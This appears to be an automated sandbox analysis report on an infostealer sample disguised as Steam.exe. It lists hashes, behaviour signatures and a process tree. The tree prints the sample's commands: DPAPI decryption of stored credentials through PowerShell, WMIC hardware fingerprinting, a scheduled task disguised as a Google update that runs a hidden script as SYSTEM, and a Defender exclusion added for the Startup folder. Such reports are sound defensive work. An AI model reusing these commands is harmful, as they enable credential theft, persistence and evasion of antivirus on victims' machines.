Analysis

  • max time kernel
    2s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07-04-2024 19:44

General

  • Target
    Steam.exe
  • Size
    154.5MB
  • MD5
    8a3861c725d108eb0c1a17fa43f0487a
  • SHA1
    e4b713028e43e0f99e4568aa3902384b52951ed2
  • SHA256
    0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef
  • SHA512
    db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad
  • SSDEEP
    1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Steam.exe
    "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4508
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3388
        • C:\Windows\system32\curl.exe
          curl http://api.ipify.org/ --ssl-no-revoke
          3⤵
          PID:4536
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1604
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,50,189,46,163,143,204,242,57,124,130,127,199,217,241,213,20,38,56,175,56,52,37,95,222,179,249,84,127,57,193,28,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,137,192,49,120,208,49,5,117,80,140,220,235,39,38,191,115,173,148,172,228,133,69,61,50,109,196,44,230,130,106,62,48,0,0,0,59,204,109,24,185,235,126,93,115,15,225,227,72,95,64,231,247,155,184,14,121,29,166,79,117,132,125,44,243,197,174,66,24,226,71,34,58,216,82,0,152,163,206,212,31,7,153,215,64,0,0,0,11,31,15,241,106,179,72,246,147,176,72,177,106,139,56,202,110,163,82,178,125,177,194,142,39,175,3,106,91,22,111,132,180,62,73,234,185,254,72,51,72,15,168,3,227,153,170,224,109,39,97,125,20,214,218,204,58,75,50,110,189,234,182,171), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,50,189,46,163,143,204,242,57,124,130,127,199,217,241,213,20,38,56,175,56,52,37,95,222,179,249,84,127,57,193,28,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,137,192,49,120,208,49,5,117,80,140,220,235,39,38,191,115,173,148,172,228,133,69,61,50,109,196,44,230,130,106,62,48,0,0,0,59,204,109,24,185,235,126,93,115,15,225,227,72,95,64,231,247,155,184,14,121,29,166,79,117,132,125,44,243,197,174,66,24,226,71,34,58,216,82,0,152,163,206,212,31,7,153,215,64,0,0,0,11,31,15,241,106,179,72,246,147,176,72,177,106,139,56,202,110,163,82,178,125,177,194,142,39,175,3,106,91,22,111,132,180,62,73,234,185,254,72,51,72,15,168,3,227,153,170,224,109,39,97,125,20,214,218,204,58,75,50,110,189,234,182,171), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3152
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,197,224,143,28,165,54,72,92,246,233,32,191,24,46,105,246,181,80,82,244,98,50,113,77,39,131,70,107,20,17,18,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,232,214,33,109,10,171,34,88,45,244,211,68,213,248,113,63,204,186,57,152,167,39,14,173,231,102,13,79,123,220,0,48,0,0,0,244,7,62,86,224,27,249,160,142,173,50,211,245,131,94,250,110,91,14,170,146,113,247,253,255,250,252,147,32,58,62,71,210,115,235,233,237,24,64,161,187,109,9,21,221,186,174,22,64,0,0,0,163,34,23,217,160,123,207,120,182,62,130,149,38,16,101,148,40,131,230,239,228,34,24,160,57,101,112,128,25,35,97,186,123,245,48,119,175,155,108,52,91,185,179,137,26,89,91,37,95,12,36,179,157,222,62,201,104,125,193,181,138,54,90,149), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        PID:2680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,187,129,194,217,126,131,1,74,168,57,210,138,107,137,189,212,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,197,224,143,28,165,54,72,92,246,233,32,191,24,46,105,246,181,80,82,244,98,50,113,77,39,131,70,107,20,17,18,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,232,214,33,109,10,171,34,88,45,244,211,68,213,248,113,63,204,186,57,152,167,39,14,173,231,102,13,79,123,220,0,48,0,0,0,244,7,62,86,224,27,249,160,142,173,50,211,245,131,94,250,110,91,14,170,146,113,247,253,255,250,252,147,32,58,62,71,210,115,235,233,237,24,64,161,187,109,9,21,221,186,174,22,64,0,0,0,163,34,23,217,160,123,207,120,182,62,130,149,38,16,101,148,40,131,230,239,228,34,24,160,57,101,112,128,25,35,97,186,123,245,48,119,175,155,108,52,91,185,179,137,26,89,91,37,95,12,36,179,157,222,62,201,104,125,193,181,138,54,90,149), $null, 'CurrentUser')
          3⤵
          PID:4632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
        2⤵
        PID:1452
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic diskdrive get serialnumber
          3⤵
          PID:3128
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
        2⤵
        PID:3232
        • C:\Windows\system32\reg.exe
          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
          3⤵
          PID:3188
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
        2⤵
        PID:560
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
          3⤵
          • Creates scheduled task(s)
          PID:4312
      • C:\Users\Admin\AppData\Local\Temp\Steam.exe
        "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 --field-trial-handle=1976,i,10464023644433361882,5698012079200874433,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        2⤵
        PID:5008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
        2⤵
        PID:3144
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic bios get smbiosbiosversion
          3⤵
          PID:4912
      • C:\Users\Admin\AppData\Local\Temp\Steam.exe
        "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,10464023644433361882,5698012079200874433,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        2⤵
        PID:3584
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
        2⤵
        PID:3108
        • C:\Windows\system32\cscript.exe
          cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
          3⤵
          PID:2876
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
            4⤵
            PID:4496
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
              5⤵
              PID:3928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
        2⤵
        PID:1396
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic MemoryChip get /format:list
          3⤵
          PID:64
        • C:\Windows\system32\find.exe
          find /i "Speed"
          3⤵
          PID:4860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
        2⤵
        PID:2916
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic baseboard get serialnumber
          3⤵
          PID:1100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
        2⤵
        PID:1360
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic path win32_computersystemproduct get uuid
          3⤵
          PID:1516
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
        2⤵
        PID:4792
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell wininit.exe
          3⤵
          PID:4152
          • C:\Windows\system32\wininit.exe
            "C:\Windows\system32\wininit.exe"
            4⤵
            PID:3024

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: f48896adf9a23882050cdff97f610a7f
    SHA1: 4c5a610df62834d43f470cae7e851946530e3086
    SHA256: 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
    SHA512: 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: c428399b96e965ae61cee1ba767fd9d9
    SHA1: 8964316b735c23fca792ba85354eacdd8dbb5e35
    SHA256: 14053c0f27a0c695462fad737c6b0c9810dce4472835977e9f08bca3ef0f7462
    SHA512: 5ef32b49b638dca1e5e4adf3c1823a23735c6539d06092e46bdbf97f23b2e4201455ab5e01a019167cd0c80865411ea4fb1e67cc25a3bb58989834a7a34956f7
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 255a9b37b2bd7075089f542af8618032
    SHA1: 1a043cfdf06b81ce7af3943ed3f32467a3cc8c11
    SHA256: cc32f15284d1effcd95e4660be1d9b93559d97addc14101d4bffb14578c4d3f0
    SHA512: 6aefe9f3109d4ff2097cf9027da10dc22c859df04f29a3a0d5019395257a510d210fd94c8f391aa7c5012757c07d6f676ccf7eed16a2be716cc3fa00356cf9a2
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gtke0ao.tv2.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\ef7732b5-61d9-4e21-ac03-811aceb00d8f.tmp.node
    Filesize: 1.8MB
    MD5: 3072b68e3c226aff39e6782d025f25a8
    SHA1: cf559196d74fa490ac8ce192db222c9f5c5a006a
    SHA256: 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
    SHA512: 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
  • C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat
    Filesize: 1KB
    MD5: 79a5e87823b83ea148f718b5fe237ec9
    SHA1: 408431f7d062aef5017f2ce715b2da16a8585fa8
    SHA256: 0626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1
    SHA512: 2433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8
  • C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs
    Filesize: 155B
    MD5: 849a5123f73771f6fe0e36056813e7cb
    SHA1: ccf4436fccf38a27cabf2603e61557976dbe3b01
    SHA256: e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870
    SHA512: 1204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd
  • memory/3152-18-0x000001C0C4C10000-0x000001C0C4C20000-memory.dmp
    Filesize: 64KB
  • memory/3152-17-0x000001C0C4C10000-0x000001C0C4C20000-memory.dmp
    Filesize: 64KB
  • memory/3152-11-0x000001C0AC780000-0x000001C0AC7A2000-memory.dmp
    Filesize: 136KB
  • memory/3152-23-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp
    Filesize: 10.8MB
  • memory/3152-16-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp
    Filesize: 10.8MB
  • memory/3152-19-0x000001C0C7150000-0x000001C0C71A0000-memory.dmp
    Filesize: 320KB
  • memory/3928-73-0x0000020340090000-0x00000203400A0000-memory.dmp
    Filesize: 64KB
  • memory/3928-72-0x00007FFBC9EC0000-0x00007FFBCA981000-memory.dmp
    Filesize: 10.8MB
  • memory/4152-84-0x00007FFBC9EC0000-0x00007FFBCA981000-memory.dmp
    Filesize: 10.8MB
  • memory/4152-85-0x000001D41C110000-0x000001D41C120000-memory.dmp
    Filesize: 64KB
  • memory/4632-41-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp
    Filesize: 10.8MB
  • memory/4632-28-0x00000262EFDA0000-0x00000262EFDB0000-memory.dmp
    Filesize: 64KB
  • memory/4632-27-0x00000262EFDA0000-0x00000262EFDB0000-memory.dmp
    Filesize: 64KB
  • memory/4632-26-0x00007FFBCB260000-0x00007FFBCBD21000-memory.dmp
    Filesize: 10.8MB